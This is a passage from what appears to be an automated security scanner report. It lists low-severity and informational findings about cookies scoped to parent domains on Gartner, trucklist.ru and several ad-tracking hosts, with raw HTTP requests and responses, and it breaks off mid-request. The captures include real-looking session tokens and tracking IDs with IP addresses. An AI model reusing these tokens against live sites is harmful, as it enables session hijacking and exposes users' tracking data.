http://r2.mail.ru/b13058840.jpg
http://r2.mail.ru/b13058851.jpg
http://r2.mail.ru/b13058852.jpg
http://r2.mail.ru/b13058968.jpg
http://r2.mail.ru/b13059223.jpg
http://r2.mail.ru/b13059860.jpg
http://r2.mail.ru/b13060405.jpg
http://r2.mail.ru/b13060487.jpg
http://r2.mail.ru/b13061099.jpg
http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif
http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif
http://segment-pixel.invitemedia.com/pixel
http://storage.trafic.ro/js/trafic.js
http://top5.mail.ru/counter
http://www.livejournal.com/tools/endpoints/journalspotlight.bml
http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

15.1. http://www.gartner.com/technology/contact/contact_gartner.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gartner.com
Path:	/technology/contact/contact_gartner.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology/contact/contact_gartner.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:14 GMT
ETag: "pv99785f693982e6484f97f558a3076f92"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U2C9A436D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 16560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>

<head>

<!-- Changes to title and meta tags
...[SNIP]...

15.2. http://www.trucklist.ru/cars/trucks previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/cars/trucks

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
<meta htt
...[SNIP]...

15.3. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

15.4. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...

15.5. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6sn9=dlx%3A6ot5%3A1; rth=2-ljzkpb-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:01 GMT
Connection: close
Set-Cookie: T_6sn9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

15.6. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9xbg=eo7%3A85ej%3A1; rth=2-ljzkpb-eo7~85ej~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:11 GMT
Connection: close
Set-Cookie: T_9xbg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

15.7. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303741228.986,wait-%3E10000,&1303741240885 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:25 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

15.8. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25091

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...

15.9. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?C1=8&C2=6035824&C3=1271511541440207100&C4=&C5=&C6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:22:00 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

15.10. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=88302011 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:20:21 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

15.11. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732016&c4=181106347&c5=1&c6=22&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&c9=&c10=&c15=&1303741232904 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
